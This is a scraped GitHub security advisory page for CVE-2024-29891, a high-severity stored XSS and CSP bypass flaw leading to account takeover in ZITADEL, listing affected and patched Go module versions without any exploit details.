        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-29891

**ZITADEL's Improper Content-Type Validation Leads to Account Takeover via Stored XSS + CSP Bypass**

High severity GitHub Reviewed Published Mar 27, 2024 in zitadel/zitadel • Updated Mar 28, 2024

**Package**

gomod github.com/zitadel/zitadel (Go)

**Affected versions**

< 2.42.17

\>= 2.43.0, < 2.43.11

\>= 2.44.0, < 2.44.7

\>= 2.45.0, < 2.45.5

\>= 2.46.0, < 2.46.5

\>= 2.47.0, < 2.47.8

\>= 2.48.0, < 2.48.3

**Patched versions**

2.42.17

2.43.11

2.44.7

2.45.5

2.46.5

2.47.8

2.48.3

**Description**

Published to the GitHub Advisory Database

Mar 28, 2024

Last updated

Mar 28, 2024

Tag

#firefox